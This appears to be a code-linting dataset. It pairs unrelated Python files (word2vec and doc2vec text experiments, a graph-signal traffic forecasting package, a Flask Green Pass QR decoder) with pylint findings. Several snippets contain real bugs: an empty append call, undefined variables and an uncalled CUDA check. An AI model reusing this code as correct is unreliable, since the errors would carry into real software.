49 # Download the punkt tokenizer for sentence splitting
50 import nltk.data
51 # Load the punkt tokenizer
52 tokenizer = nltk.data.load('tokenizers/punkt/english.pickle')
53
54
55 # Define a function to split a review into parsed sentences
56 def review_to_sentences( review, tokenizer, remove_stopwords=True ):
57 # Function to split a review into parsed sentences. Returns a
58 # list of sentences, where each sentence is a list of words
59 #
60 # 1. Use the NLTK tokenizer to split the paragraph into sentences
61 raw_sentences = tokenizer.tokenize(review.strip())
62 #
63 # 2. Loop over each sentence
64 sentences = []
65 for raw_sentence in raw_sentences:
66 # If a sentence is empty, skip it
67 if len(raw_sentence) > 0:
68 # Otherwise, call review_to_wordlist to get a list of words
69 sentences.append( )
70 #
71 # Return the list of sentences (each sentence is a list of words,
72 # so this returns a list of lists
73 return sentences
74
75 sentences = [] # Initialize an empty list of sentences
76
77 print "Parsing sentences from training set"
78 for review in clean_train_reviews:
79 sentences += review_to_sentences(review, tokenizer)
80
81
82 # Import the built-in logging module and configure it so that Word2Vec
83 # creates nice output messages
84 import logging
85 logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s',
86 level=logging.INFO)
87
88 # Set values for various parameters
89 num_features = 400 # Word vector dimensionality
90 min_word_count = 1 # Minimum word count
91 num_workers = 4 # Number of threads to run in parallel
92 context = 20 # Context window size
93 downsampling = 1e-3 # Downsample setting for frequent words
94
95 # Initialize and train the model (this will take some time)
96 from gensim.models import word2vec
97 print "Training model..."
98
99 # bigram_transformer = gensim.models.Phrases(sentences)
100 # >>> model = Word2Vec(bigram_transformer[sentences], size=100, ...)
101
102 model = word2vec.Word2Vec(sentences, workers=num_workers,
103 size=num_features, min_count = min_word_count,
104 window = context, sample = downsampling, batch_words = 1000)
105
106 # If you don't plan to train the model any further, calling
107 # init_sims will make the model much more memory-efficient.
108 model.init_sims(replace=True)
109
110 # It can be helpful to create a meaningful model name and
111 # save the model for later use. You can load it later using Word2Vec.load()
112 model_name = "400features_2minwords_20context"
113 model.save(model_name)
114
115 print model.doesnt_match("man woman child kitchen".split())
116 print model.doesnt_match("france england germany berlin".split())
117 print model.most_similar("prawn", topn=10) | 77 - error: syntax-error
|
1 # coding=utf-8
2 import os
3 import re
4 import numpy as np
5 from abstract import Abstract
6
7 __author__ = 'rcastro'
8
9 from gensim.models import Doc2Vec
10 from gensim.models.doc2vec import TaggedLineDocument, TaggedDocument
11 from codecs import open
12
13
14 def remove_numeric_tokens(string):
15 return re.sub(r'\d+[^\w|-]+', ' ', string)
16
17
18 # Convert text to lower-case and strip punctuation/symbols from words
19 def normalize_text(text):
20 norm_text = text.lower()
21 # control_chars = [chr(0x85)]
22 # for c in control_chars:
23 # norm_text = norm_text.replace(c, ' ') # Replace breaks with spaces
24 # norm_text = norm_text.replace('<br />', ' ')
25
26 # Pad punctuation with spaces on both sides
27 for char in ['.', '"', ',', '!', '?', ';', ':']:
28 norm_text = norm_text.replace(char, ' ' + char + ' ')
29
30 return norm_text
31
32
33 sentences_keywords = []
34 docs_filename = 'abstracts_preprocesados.txt'
35 if not os.path.isfile(docs_filename):
36 print "get the abstracts"
37 text = ''
38 try:
39 with open('abstracts.txt', 'r', encoding='utf8') as abstracts_file:
40 text = abstracts_file.read().strip()
41 except IOError as e:
42         print 'could not read the abstracts: %s' % e.strerror
43
44 abstracts = [Abstract(x) for x in text.split("\r\n\r\n")]
45 for article in abstracts:
46 sentences_keywords.append([normalize_text(remove_numeric_tokens(x)).strip() for x in article.keywords])
47 with open(docs_filename, 'w', encoding='utf8') as f:
48 for idx, line in enumerate([normalize_text(remove_numeric_tokens(x.text)) for x in abstracts]):
49 f.write(line + '\n')
50 # # num_line = "_*{0} {1}\n".format(idx, line)
51 # # f.write(line+'\n')
52
53 sentences = TaggedLineDocument('abstracts_preprocesados.txt')
54 # sentences = sentences_keywords
55
56
57 # We are going to use Doc2vec, see http://rare-technologies.com/doc2vec-tutorial/
58
59 from gensim.models import Doc2Vec
60 import gensim.models.doc2vec
61 from collections import OrderedDict
62 import multiprocessing
63
64 cores = multiprocessing.cpu_count()
65 assert gensim.models.doc2vec.FAST_VERSION > -1, "this will be painfully slow otherwise"
66
67 # Set values for various parameters
68 num_features = 400 # Word vector dimensionality
69 # min_word_count = 1 # Minimum word count
70 # context = 20 # Context window size
71 # downsampling = 1e-3 # Downsample setting for frequent words
72
73 # 3 different models with 50-dimensional vectors
74 simple_models = [
75 # PV-DM w/concatenation - window=10 (both sides) approximates paper's 10-word total window size
76 Doc2Vec(dm=1, dm_concat=1, size=50, window=10, negative=10, hs=0, min_count=2, workers=cores),
77 # PV-DBOW
78 Doc2Vec(dm=0, size=50, negative=5, hs=0, min_count=2, workers=cores),
79 # PV-DM w/average
80 Doc2Vec(dm=1, dm_mean=1, size=50, window=10, negative=5, hs=0, min_count=2, workers=cores),
81 ]
82
83 # 3 different models with 400-dimensional vectors
84 simple_models_400 = [
85 # PV-DM w/concatenation - window=5 (both sides) approximates paper's 10-word total window size
86 Doc2Vec(dm=1, dm_concat=1, size=num_features, window=10, negative=10, hs=0, min_count=2, workers=cores),
87 # PV-DBOW
88 Doc2Vec(dm=0, size=num_features, negative=5, hs=0, min_count=2, workers=cores),
89 # PV-DM w/average
90 Doc2Vec(dm=1, dm_mean=1, size=num_features, window=10, negative=5, hs=0, min_count=2, workers=cores),
91 ]
92
93 # speed setup by sharing results of 1st model's vocabulary scan
94 simple_models[0].build_vocab(sentences) # PV-DM/concat requires one special NULL word so it serves as template
95 print(simple_models[0])
96 for model in simple_models[1:]:
97 model.reset_from(simple_models[0])
98 print(model)
99
100
101 for model in simple_models_400:
102 model.reset_from(simple_models[0])
103 print(model)
104
105 all_models = simple_models+simple_models_400
106 models_by_name = OrderedDict((str(model), model) for model in all_models)
107
108 '''
109 Following the paper, we also evaluate models in pairs. These wrappers return the concatenation of the vectors from each model. (Only the singular models are trained.)
110 In [5]:
111 from gensim.test.test_doc2vec import ConcatenatedDoc2Vec
112 models_by_name['dbow+dmm'] = ConcatenatedDoc2Vec([simple_models[1], simple_models[2]])
113 models_by_name['dbow+dmc'] = ConcatenatedDoc2Vec([simple_models[1], simple_models[0]])
114 '''
115
116 from random import shuffle
117 import datetime
118
119 # for timing
120 from contextlib import contextmanager
121 from timeit import default_timer
122 import random
123
124 @contextmanager
125 def elapsed_timer():
126 start = default_timer()
127 elapser = lambda: default_timer() - start
128 yield lambda: elapser()
129 end = default_timer()
130 elapser = lambda: end-start
131
132 passes = 20
133 print("START %s" % datetime.datetime.now())
134
135 all_docs = []
136 for doc in sentences:
137 all_docs.append(doc)
138 for epoch in range(passes):
139 shuffle(all_docs) # shuffling gets best results
140
141 # doc_id = np.random.randint(len(sentences)) #
142     doc_id = np.random.randint(simple_models[0].docvecs.count) # pick a random doc (choose a random abstract and look for the most similar ones)
143
144 for name, model in models_by_name.items()[:3]:
145 with elapsed_timer() as elapsed:
146 model.train(all_docs)
147 # duration = '%.1f' % elapsed()
148 # print (name, duration)
149 sims = model.docvecs.most_similar(doc_id, topn=model.docvecs.count) # get *all* similar documents
150 print(u'ABSTRACTS mas similares por modelo %s:\n' % model)
151 print(u'abstract escogido: «%s»\n' % (' '.join(all_docs[doc_id].words)))
152 print(u'y sus keywords: «%s»\n' % (' '.join(sentences_keywords[doc_id])))
153 for label, index in [('MOST', 0)]: #, ('MEDIAN', len(sims)//2), ('LEAST', len(sims) - 1)]:
154 print(u'%s %s: «%s»\n' % (label, sims[index][1], ' '.join(all_docs[sims[index][0]].words)))
155 print(u'Keywords de los docs similares: «%s»\n' % (' '.join(sentences_keywords[sims[index][0]])))
156
157
158 word_models = all_models[:3]
159 # while True:
160 # word = random.choice(word_models[0].index2word)
161 # if word_models[0].vocab[word].count > 10 and len(word)>3:
162 # break
163
164 # here you can substitute a different word and see which similar words each model returns...
165 word = "aquaculture" #diadromous
166 similars_per_model = [str(model.most_similar(word, topn=5)).replace('), ','),<br>\n') for model in word_models]
167 similar_table = ("<table><tr><th>" +
168 "</th><th>".join([str(model) for model in word_models]) +
169 "</th></tr><tr><td>" +
170 "</td><td>".join(similars_per_model) +
171 "</td></tr></table>")
172 print("most similar words for '%s' (%d occurrences)" % (word, simple_models[0].vocab[word].count))
173 print(similar_table)
174
175 #TODO import wiki model and add to word_models
| 36 - error: syntax-error
|
1
2 import time
3 import numpy as np
4 import pandas as pd
5 import torch
6 import torch.utils.data as utils
7
8 from pytorch_gsp.utils.gsp import complement
9
10
11 def PrepareSequence(data, seq_len = 10, pred_len = 1):
12
13 time_len = data.shape[0]
14 sequences, labels = [], []
15 for i in range(time_len - seq_len - pred_len):
16 sequences.append(data[i:i+seq_len])
17 labels.append(data[i+seq_len+pred_len-1:i+seq_len+pred_len])
18 return np.asarray(sequences), np.asarray(labels)
19
20
21
22 def SplitData(data, label = None, seq_len = 10, pred_len = 1, train_proportion = 0.7,
23 valid_proportion = 0.2, shuffle = False):
24
25 max_value = np.max(data)
26 data /= max_value
27 samp_size = data.shape[0]
28 if label is not None:
29 assert(label.shape[0] == samp_size)
30
31 index = np.arange(samp_size, dtype = int)
32 train_index = int(np.floor(samp_size * train_proportion))
33 valid_index = int(np.floor(samp_size * ( train_proportion + valid_proportion)))
34
35 if label is not None:
36 train_data, train_label = data[:train_index+pred_len-1], label[:train_index+pred_len-1]
37 valid_data, valid_label = data[train_index-seq_len:valid_index+pred_len-1], label[train_index-seq_len:valid_index+pred_len-1]
38 test_data, test_label = data[valid_index-seq_len:], label[valid_index-seq_len:]
39 return (train_data, train_label), (valid_data, valid_label), (test_data, test_label), max_value
40
41 else:
42 train_data = data[:train_index+pred_len-1]
43 valid_data = data[train_index-seq_len:valid_index+pred_len-1]
44 test_data = data[valid_index-seq_len:]
45 return train_data ,valid_data, test_data, max_value
46
47
48
49 def Dataloader(data, label, batch_size = 40, suffle = False):
50
51 data, label = torch.Tensor(data), torch.Tensor(label )
52 dataset = utils.TensorDataset(data, label)
53 dataloader = utils.DataLoader(dataset, batch_size = batch_size, shuffle=suffle, drop_last = True)
54 return dataloader
55
56
57 def Preprocessing_hop_interp(matrix, A ,sample):
58
59 unknown = complement(sample,matrix.shape[1])
60 features_unknown = np.copy(matrix.values)
61 features_unknown[:,unknown] = np.mean(matrix.values[:100,sample])
62 for node in unknown:
63 neighbors = np.nonzero(A[node])[0]
64 for t in range(features_unknown.shape[0]):
65 features_unknown[np.array([t]), np.array([node])] = np.mean(features_unknown[t, neighbors])
66 return features_unknown
67
68
69 def MaxScaler(data):
70 max_value = np.max(data)
71 return max_value, data/max_value
72
73 def Preprocessing_GFT(matrix,sample, V , freqs ):
74
75 x = matrix.T
76 Vf = V[:, freqs]
77 Psi = np.zeros((V.shape[0],x.shape[1]))
78 Psi[sample] = x
79 Tx = (Vf.T@Psi).T
80 return Tx
81
82 class DataPipeline:
83 def __init__(self, sample, V , freqs ,seq_len, pred_len, gft = True):
84 """
85 DataPipeline: perform the sampling procedure on the graph signals and create the dataloader object
86 Args:
87 sample (np array): list of graph indices
88 V (2D np array): Laplacian eigenvector matrix
89 freqs (np array): list of frequency indices
90             seq_len (int): size of the historical input window
91             pred_len (int): number of future samples to predict
92             gft (bool, optional): if the graph Fourier transform should be applied. Defaults to True.
93 """
94
95 self.sample = sample
96 self.V = V
97 self.freqs = freqs
98 self.seq_len = seq_len
99 self.pred_len = pred_len
100 self.gft = gft
101
102 def fit(self,train_data,sample_label = True, batch_size=40, shuffle=True):
103 """
104 fit: build dataloader for training data
105
106 Args:
107 train_data (numpy array): train data
108             sample_label (bool, optional): If labels should be sampled for
109                 semi-supervised learning. Defaults to True.
110 batch_size (int, optional): batch size. Defaults to 40.
111 shuffle (bool, optional): If samples should be shuffled. Defaults to True.
112
113 Returns:
114 pytorch Dataloader: train data prepared for training
115 """
116
117 train_X, train_y = PrepareSequence(train_data, seq_len = self.seq_len, pred_len = self.pred_len)
118
119 if self.gft:
120 train_data_freqs = Preprocessing_GFT(train_data[:,self.sample],self.sample, self.V , self.freqs )
121 train_X_freqs, _ = PrepareSequence(train_data_freqs, seq_len = self.seq_len, pred_len = self.pred_len)
122 train_X = np.concatenate((train_X[:,:,self.sample], train_X_freqs), axis=-1)
123
124 if sample_label:
125 train_y = train_y.T[self.sample]
126 train_y = train_y.T
127
128 return Dataloader(train_X, train_y, batch_size, shuffle)
129
130 def transform(self, data, sample_label = True, batch_size=40,shuffle=True):
131 """
132 transform: build dataloader for validation and test data
133
134 Args:
135             data (numpy array): validation or test data
136             sample_label (bool, optional): If labels should be sampled for
137                 semi-supervised learning. Defaults to True.
138 batch_size (int, optional): batch size. Defaults to 40.
139 shuffle (bool, optional): If samples should be shuffled. Defaults to True.
140
141 Returns:
142             pytorch Dataloader: data prepared for evaluation
143 """
144
145 X, y = PrepareSequence(data, seq_len = self.seq_len, pred_len = self.pred_len)
146
147 if self.gft:
148 data_freqs = Preprocessing_GFT(data[:,self.sample],self.sample, self.V , self.freqs)
149 X_freqs, _ = PrepareSequence(data_freqs, seq_len = self.seq_len, pred_len = self.pred_len)
150
151 X = np.concatenate((X[:,:,self.sample], X_freqs), axis=-1)
152 if sample_label:
153 y = y.T[self.sample]
154 y = y.T
155 return Dataloader(X, y, batch_size, shuffle)
156
157
158
159
160
161
162
163
| 22 - refactor: too-many-arguments
22 - refactor: too-many-positional-arguments
22 - refactor: too-many-locals
35 - refactor: no-else-return
23 - warning: unused-argument
31 - warning: unused-variable
83 - refactor: too-many-arguments
83 - refactor: too-many-positional-arguments
2 - warning: unused-import
4 - warning: unused-import
|
1 import os
2 import time
3 import torch
4 import argparse
5 import numpy as np
6 import pandas as pd
7 import time
8
9 from data.Load_data import Seattle_data
10 from data.Dataloader import *
11
12 from pytorch_gsp.train.train_rnn import Evaluate, Train
13 from pytorch_gsp.utils.gsp import ( greedy_e_opt, spectral_components)
14 from pytorch_gsp.models.sggru import *
15
16 def n_params(model):
17 params=[]
18 for param in model.parameters():
19 params.append(param.numel())
20 return np.sum(params)
21
22 print(torch.__version__)
23
24
25
26 def training_routine(args):
27
28
29 device = 'cuda' if torch.cuda.is_available else 'cpu'
30 if args.device == 'cuda' and device == 'cpu':
31 print("cuda is not available, device set to cpu")
32 else:
33 assert (args.device in ['cpu','cuda'])
34 device = args.device
35
36 lr = args.lr
37 epochs = args.epochs
38 seq_len = args.seq_len
39 pred_len = args.pred_len
40 patience = args.patience
41 name = args.save_name
42 speed_matrix, A, FFR = Seattle_data('data/Seattle_Loop_Dataset/') #put seattle Loop dataset in this directory
43
44
45 N = speed_matrix.shape[1]
46
47 S = int(args.sample_perc*N/100)
48 if args.F_perc is None:
49 F = int(S/3)
50 else:
51 F = int(args.F_perc*N/100)
52
53 assert(S>F) # the sampling set must be larger than the spectral support
54
55 #compute gft
56 F_list, V = spectral_components(A,np.array(speed_matrix)[:1000] )
57 if args.supervised:
58 freqs = F_list[:F]
59 else:
60 freqs = np.arange(0,F,1)
61
62 if args.e_opt:
63 print("Using e-optimal greedy algorithm")
64 if args.sample_perc == 25:
65 sample = np.load( 'data/Seattle_Loop_Dataset/sample_opt25.npy')[0]
66 elif args.sample_perc == 50:
67 sample = np.load( 'data/Seattle_Loop_Dataset/sample_opt50.npy')[0]
68 elif args.sample_perc == 75:
69 sample = np.load( 'data/Seattle_Loop_Dataset/sample_opt75.npy')[0]
70 else:
71 sample = greedy_e_opt(V[:,Fs],S)
72
73 else: sample = np.sort(np.random.choice(np.arange(N), S, replace = False))
74
75 S = len(sample)
76 pre_time = time.time()
77
78 train, valid, test,max_value = SplitData(speed_matrix.values, label = None, seq_len = 10,
79 pred_len = 1, train_proportion = 0.7,
80 valid_proportion = 0.2, shuffle = False)
81
82 pipeline = DataPipeline(sample,V,freqs,seq_len,pred_len)
83
84 train_dataloader = pipeline.fit(train)
85 valid_dataloader = pipeline.transform(valid)
86 test_dataloader = pipeline.transform(test,sample_label=False,batch_size = test.shape[0]-seq_len-pred_len,shuffle=False)
87
88 print("Preprocessing time:", time.time()-pre_time)
89
90
91 layer = SpectralGraphForecast(V, sample,freqs, rnn = 'gru')
92 if args.supervised:
93 sggru = model(V,sample,freqs, layer,l1=0,l2=0.0,supervised = True).to(device)
94 else:
95 sggru = model(V,sample,freqs, layer,l1=0,l2=0.0,supervised = False).to(device)
96
97 pre_time = time.time()
98
99 print("Total number of nodes: {}".format(N))
100 print("Sample size: {}".format(S))
101 print("Spectral sample size: {}".format(F))
102 print("Initial learning rate: {}".format(lr))
103
104
105 sggru,sggru_loss= Train(sggru ,train_dataloader, valid_dataloader, epochs = epochs,
106 learning_rate = lr,patience=patience ,sample = sample)
107 print("Training time:", time.time()-pre_time)
108 pre_time = time.time()
109 sggru_test = Evaluate(sggru.to(device), test_dataloader, max_value )
110 print("Test time:", time.time()-pre_time)
111 name = 'sggru'
112
113 loss = (sggru_loss,sggru_test)
114 os.makedirs("models_and_losses/", exist_ok=True)
115 torch.save(sggru, "models_and_losses/{}.pt".format(name))
116 np.save("models_and_losses/{}.npy".format(name),loss)
117
118
119 if __name__ == "__main__":
120 parser = argparse.ArgumentParser(description='Semi-Supervised Prediction\n SeattleLoop dataset \n download link: https://github.com/zhiyongc/Seattle-Loop-Data ')
121 parser.add_argument('--epochs', type=int, default = 100, help='maximum number of epochs before stopping training')
122 parser.add_argument('--lr', type=float, default = 1e-4, help='starting learn rate' )
123 parser.add_argument('--patience', type=int, default = 10, help='number of consecutive non-improving validation loss epochs before stop training')
124 parser.add_argument('--sample-perc', type=int, default = 50, help='percentage of in-sample nodes')
125 parser.add_argument('--F-perc', type=int, default = None, help='percentage of frequencies to keep in frequency set \mathcal{F}')
126 parser.add_argument('--S-perc', type=int, default = 50, help='percentage of samples')
127 parser.add_argument('--e-opt', action='store_true',help='if sampling is performed by E-optmal greedy algorithm')
128 parser.add_argument('--sample-seed',type=int,default=1, help='number of run with uniformely random samples. Only used if --e-opt is False')
129 parser.add_argument('--seq-len', type=int,default=10, help='history length')
130 parser.add_argument('--pred-len', type=int,default=1, help='prediction horizon')
131 parser.add_argument('--save-name', type=str, default='sggru_S50_F53_opt_pred1', help='name of file')
132     parser.add_argument('--supervised', action='store_true', help='if training is supervised or semi-supervised. Default is semi-supervised')
133 parser.add_argument('--device', type=str, default='cuda', help='devices: cuda or cpu')
134 args = parser.parse_args()
135 training_routine(args)
136
| 125 - warning: anomalous-backslash-in-string
7 - warning: reimported
10 - warning: wildcard-import
14 - warning: wildcard-import
26 - refactor: too-many-locals
26 - warning: redefined-outer-name
29 - warning: missing-parentheses-for-call-in-test
29 - warning: using-constant-test
71 - error: undefined-variable
78 - error: undefined-variable
82 - error: undefined-variable
91 - error: undefined-variable
93 - error: undefined-variable
95 - error: undefined-variable
26 - refactor: too-many-branches
26 - refactor: too-many-statements
42 - warning: unused-variable
6 - warning: unused-import
|
1 import os
2 import sys
3
4 current_dir = os.path.split(os.path.dirname(os.path.realpath(__file__)))[0]
5 sys.path.append(os.path.join(current_dir, 'data'))
6 print(sys.path) | Clean Code: No Issues Detected
|
1 import math
2 import sys
3 import time
4
5 import numpy as np
6 import pandas as pd
7 from sklearn.metrics.pairwise import rbf_kernel
8
9
10
11 def USA_data(directory ):
12     """TODO: include the GSOD dataset"""
13 signals = pd.read_csv( directory + 'Usa_temp.csv')
14 if "Unnamed: 0" in signals.columns:
15 signals.drop(columns="Unnamed: 0", inplace = True)
16 A = np.load( directory + 'Adjk10_07-13.npy')
17
18 return signals, A
19
20
21 def Seattle_data(directory , binary=False):
22 """
23 Seattle_data:
24 https://github.com/zhiyongc/Graph_Convolutional_LSTM/blob/master/Code_V2/HGC_LSTM%20%26%20Experiments.ipynb
25
26 Args:
27 directory (str): directory of the seattle loop detector dataset
28         binary (bool, optional): If the adjacency matrix should be kept binary or weighted
29                 by an RBF kernel of the speed signals. Defaults to False.
30
31 Returns:
32 speed_matrix: graph signals with time in the rows and nodes in the columns
33 A: adjacency matrix
34 FFR: free flow reachability matrices
35 """
36 speed_matrix = pd.read_pickle( directory + 'speed_matrix_2015',)
37 A = np.load( directory + 'Loop_Seattle_2015_A.npy')
38
39 if not binary:
40 cor = rbf_kernel(speed_matrix[:1000].T/10)
41 A = cor*(A)
42 e, V = np.linalg.eigh(A)
43 A/=np.max(e)
44 A = A-np.diag(A.diagonal())
45
46 FFR_5min = np.load( directory + 'Loop_Seattle_2015_reachability_free_flow_5min.npy')
47 FFR_10min = np.load( directory + 'Loop_Seattle_2015_reachability_free_flow_10min.npy')
48 FFR_15min = np.load( directory + 'Loop_Seattle_2015_reachability_free_flow_15min.npy')
49 FFR_20min = np.load( directory + 'Loop_Seattle_2015_reachability_free_flow_20min.npy')
50 FFR_25min = np.load( directory + 'Loop_Seattle_2015_reachability_free_flow_25min.npy')
51 FFR = [FFR_5min, FFR_10min, FFR_15min, FFR_20min, FFR_25min]
52 return speed_matrix, A, FFR
53
54
55
56
57
58
| 42 - warning: unused-variable
1 - warning: unused-import
2 - warning: unused-import
3 - warning: unused-import
|
1 from setuptools import setup, find_packages
2
3 setup(
4 name='Joint-Forecasting-and-Interpolation-of-Graph-Signals-Using-Deep-Learning',
5 version='0.1.0',
6 author='Gabriela Lewenfus',
7 author_email='gabriela.lewenfus@gmail.com',
8 packages=find_packages(),
9 install_requires = ['scipy>=1.4.1', 'pandas>=0.15', 'scikit-learn>=0.22', 'numpy>=0.46'],
10 description='Code from the paper Joint Forecasting and Interpolation of Graph Signals Using Deep Learning',
11
12 ) | Clean Code: No Issues Detected
|
1 ### training code ####
2
3 import sys
4 import time
5
6 import numpy as np
7 import torch
8 from torch.autograd import Variable
9
10 toolbar_width=20
11
12
13
14 def Train(model, train_dataloader, valid_dataloader, learning_rate = 1e-5, epochs = 300, patience = 10,
15 verbose=1, gpu = True, sample = None, optimizer = 'rmsprop'):
16
17 if optimizer == 'rmsprop':
18 optimizer = torch.optim.RMSprop(model.parameters(), lr = learning_rate)
19 elif optimizer == 'adam':
20 optimizer = torch.optim.Adam(model.parameters(), lr = learning_rate )
21
22 loss_MSE = torch.nn.MSELoss()
23 loss_L1 = torch.nn.L1Loss()
24 batch_size = train_dataloader.batch_size
25
26 if gpu: device='cuda'
27 else: device= 'cpu'
28
29 losses_epochs_train = []
30 losses_epochs_valid = []
31 time_epochs = []
32 time_epochs_val = []
33
34 is_best_model = 0
35 patient_epoch = 0
36 scheduler = model.schedule(optimizer)
37
38 for epoch in range(epochs):
39 pre_time = time.time()
40
41 try:
42 data_size=train_dataloader.dataset.data_size
43 except: pass
44 try:
45 data_size=train_dataloader.dataset.tensors[0].shape[0]
46 except: pass
47 n_iter=data_size/train_dataloader.batch_size
48 if verbose:
49 count=0
50
51 checkpoints=np.linspace(0,n_iter,toolbar_width).astype(np.int16)
52 text='Epoch {:02d}: '.format(epoch)
53 sys.stdout.write(text+"[%s]" % (" " * toolbar_width))
54 sys.stdout.flush()
55 sys.stdout.write("\b" * (toolbar_width+1))
56
57 losses_train = []
58 losses_valid = []
59
60 for data in train_dataloader:
61 inputs, labels = data
62 if inputs.shape[0] != batch_size:
63 continue
64
65 model.zero_grad()
66 outputs = model(inputs.to(device))
67 outputs, y = torch.squeeze(outputs), torch.squeeze(labels).to(device)
68 loss_train = model.loss(outputs,y)
69
70 losses_train.append(loss_train.cpu().data.numpy())
71 optimizer.zero_grad()
72 loss_train.backward()
73 optimizer.step()
74
75 if verbose:
76 if count in checkpoints:
77 sys.stdout.write('=')
78 sys.stdout.flush()
79 count+=1
80
81 for param_group in optimizer.param_groups:
82 learning_rate = param_group['lr']
83 if learning_rate >1e-5:
84 scheduler.step()
85 time_epochs.append(time.time()-pre_time)
86
87 pre_time = time.time()
88
89 losses_valid = []
90 for data in valid_dataloader:
91 inputs, labels = data
92 if inputs.shape[0] != batch_size:
93 continue
94
95 outputs= model(inputs.to(device))
96 outputs, y = torch.squeeze(outputs), torch.squeeze(labels).to(device)
97 losses_valid.append(model.loss(outputs, y).cpu().data.numpy())
98
99 time_epochs_val.append(time.time()-pre_time)
100 losses_epochs_train.append(np.mean(losses_train))
101 losses_epochs_valid.append(np.mean(losses_valid))
102
103 avg_losses_epoch_train = losses_epochs_train[-1]
104 avg_losses_epoch_valid = losses_epochs_valid[-1]
105
106
107 if avg_losses_epoch_valid >100000000000:
108 print("Diverged")
109 return (None,None)
110 if epoch == 0:
111 is_best_model = True
112 best_model = model
113 min_loss = avg_losses_epoch_valid
114 else:
115 if min_loss - avg_losses_epoch_valid > 1e-6:
116 is_best_model = True
117 best_model = model
118 min_loss = avg_losses_epoch_valid
119 patient_epoch = 0
120 else:
121 is_best_model = False
122 patient_epoch += 1
123 if patient_epoch >= patience:
124 print('Early Stopped at Epoch:', epoch)
125 break
126
127 if verbose:
128 sys.stdout.write("]")
129
130 print(' train loss: {}, valid loss: {}, time: {}, lr: {}'.format( \
131 np.around(avg_losses_epoch_train, 6),\
132 np.around(avg_losses_epoch_valid, 6),\
133 np.around([time_epochs[-1] ] , 2),\
134 learning_rate) )
135
136
137 return best_model, [losses_epochs_train ,
138 losses_epochs_valid ,
139 time_epochs ,
140 time_epochs_val ]
141
142
143 def Evaluate(model, dataloader, scale=1, pred_len = 1, gpu = True):
144
145 batch_size = dataloader.batch_size
146 pre_time = time.time()
147
148 gpu = torch.cuda.is_available()
149 if gpu: device='cuda'
150 else: device= 'cpu'
151
152 losses_mse = []
153 losses_l1 = []
154 losses_mape = []
155
156 for i,data in enumerate(dataloader):
157 inputs, labels = data
158 if inputs.shape[0] != batch_size:
159 continue
160
161 outputs = model(inputs.to(device))
162 outputs, y = torch.squeeze(outputs), torch.squeeze(labels).to(device)
163
164 loss_mse = torch.nn.MSELoss()(outputs*scale, y*scale).cpu().data
165 loss_l1 = torch.nn.L1Loss()(outputs*scale, y*scale).cpu().data
166
167 outputs = outputs.cpu().data.numpy()
168 y = y.cpu().data.numpy()
169 outputs = outputs*scale
170 y = y*scale
171
172 abs_diff = np.abs((outputs-y))
173 abs_y = np.abs(y)
174 abs_diff=abs_diff[abs_y>1]
175 abs_y=abs_y[abs_y>1]
176
177 loss_mape = abs_diff/abs_y
178 loss_mape = np.mean(loss_mape)*100
179
180 losses_mse.append(loss_mse)
181 losses_l1.append(loss_l1)
182 losses_mape.append(loss_mape)
183
184 losses_l1 = np.array(losses_l1)
185 losses_mse = np.array(losses_mse)
186 mean_l1 = np.mean(losses_l1, axis = 0)
187 rmse = np.mean(np.sqrt(losses_mse))
188 print('Test: MAE: {}, RMSE : {}, MAPE : {}'.format(mean_l1, rmse,np.mean(losses_mape)))
189
190
191 return [losses_l1, losses_mse, mean_l1, np.mean(losses_mape), time.time()-pre_time]
192
193
194 ### modified from https://github.com/zhiyongc/Graph_Convolutional_LSTM/blob/master/Code_V2/HGC_LSTM%20%26%20Experiments.ipynb | 14 - refactor: too-many-arguments
14 - refactor: too-many-positional-arguments
14 - refactor: too-many-locals
43 - warning: bare-except
46 - warning: bare-except
14 - refactor: too-many-branches
14 - refactor: too-many-statements
15 - warning: unused-argument
22 - warning: unused-variable
23 - warning: unused-variable
34 - warning: unused-variable
143 - refactor: too-many-locals
143 - warning: unused-argument
156 - warning: unused-variable
8 - warning: unused-import
|
1 from flask import Flask, redirect, request, render_template
2 from os.path import splitext
3 from flask_sslify import SSLify
4 from flask_babel import Babel, gettext
5 import os
6 from lib.greenpass import GreenPassDecoder as greenpass_decoder
7
8 is_prod = os.environ.get('PRODUCTION', None)
9 ga_id = os.environ.get('GA_ID', None)
10 sharethis_script_src = os.environ.get('SHARETHIS_SCRIPT_SRC', None)
11 app_url = os.environ.get('APP_URL', None)
12
13 app = Flask(__name__)
14
15 app.config['BABEL_DEFAULT_LOCALE'] = 'en'
16 app.config['MAX_CONTENT_LENGTH'] = 4096 * 1024
17 app.config['UPLOAD_EXTENSIONS'] = ['.jpg', '.png', '.jpeg']
18 app.config['GITHUB_PROJECT'] = 'https://github.com/debba/greenpass-covid19-qrcode-decoder'
19 app.config[
20 'DCC_SCHEMA'] = 'https://raw.githubusercontent.com/ehn-dcc-development/ehn-dcc-schema/release/1.3.0/DCC.combined-schema.json'
21 app.glb_schema = {}
22 app.converted_schema = ''
23 app.config['LANGUAGES'] = {
24 'en': 'English',
25 'it': 'Italiano'
26 }
27 babel = Babel(app)
28
29
30 @babel.localeselector
31 def get_locale():
32 return request.accept_languages.best_match(app.config['LANGUAGES'].keys())
33
34
35 if is_prod:
36 sslify = SSLify(app)
37
38
39 @app.context_processor
40 def inject_user():
41 return dict(github_project=app.config['GITHUB_PROJECT'], is_prod=is_prod, ga_id=ga_id,
42 sharethis_script_src=sharethis_script_src, app_url=app_url,
43 app_name=gettext('Green Pass COVID-19 QRCode Decoder'))
44
45
46 @app.route('/', methods=['GET'])
47 def home():
48 return render_template('home.html')
49
50
51 @app.route('/qrdata', methods=['GET', 'POST'])
52 def qrdata():
53 if request.method == 'POST':
54 if request.files['image'].filename != '':
55 app.converted_schema = ''
56 image = request.files['image']
57 filename = image.filename
58 file_ext = splitext(filename)[1]
59 if filename != '':
60 if file_ext not in app.config['UPLOAD_EXTENSIONS']:
61 return render_template('error.html', error='UPLOAD_EXTENSIONS_ERROR', file_ext=file_ext), 400
62
63 try:
64 decoder = greenpass_decoder(image.stream)
65 return render_template('data.html', data=decoder.decode(app.config['DCC_SCHEMA']))
66 except (ValueError, IndexError) as e:
67 print(e)
68 return render_template('error.html', error='UPLOAD_IMAGE_NOT_VALID'), 400
69
70 return render_template('error.html', error='UPLOAD_IMAGE_WITH_NO_NAME'), 500
71 else:
72 return redirect('/') | 41 - refactor: use-dict-literal
53 - refactor: no-else-return
|
1 from pyzbar.pyzbar import decode
2 from PIL import Image
3 from base45 import b45decode
4 from zlib import decompress
5 from flynn import decoder as flynn_decoder
